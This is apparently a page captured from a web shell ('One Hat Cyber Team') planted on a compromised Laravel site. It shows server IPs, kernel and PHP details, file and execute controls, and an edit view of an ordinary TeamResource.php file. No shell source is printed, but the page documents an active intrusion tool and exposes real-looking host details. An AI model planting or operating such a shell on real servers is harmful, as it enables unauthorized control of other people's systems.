One Hat Cyber Team
Your IP:
216.73.216.30
Server IP:
198.54.114.155
Server:
Linux server71.web-hosting.com 4.18.0-513.18.1.lve.el8.x86_64 #1 SMP Thu Feb 22 12:55:50 UTC 2024 x86_64
Server Software:
LiteSpeed
PHP Version:
5.6.40
Create File
|
Create Folder
Execute
Dir :
~
/
proc
/
self
/
root
/
proc
/
thread-self
/
cwd
/
Edit File:
TeamResource.php.tar
home/fluxyjvi/public_html/project/app/Http/Resources/TeamResource.php 0000644 00000001571 15111155313 0022104 0 ustar 00 <?php namespace App\Http\Resources; use Illuminate\Http\Resources\Json\JsonResource; class TeamResource extends JsonResource { /** * Transform the resource into an array. * * @param \Illuminate\Http\Request $request * @return array|\Illuminate\Contracts\Support\Arrayable|\JsonSerializable */ public function toArray($request) { return [ 'id' => $this->id, 'name' => $this->name, 'photo' => url('/') . '/assets/images/'.$this->photo, 'facebook_link' => $this->fb_link, 'twitter_link' => $this->twitter_link, 'instragram_link' => $this->instra_link, 'linkedin_link' => $this->linkedin_link, 'youtube_link' => $this->youtube_link, 'created_at' => $this->created_at ]; } }
Simpan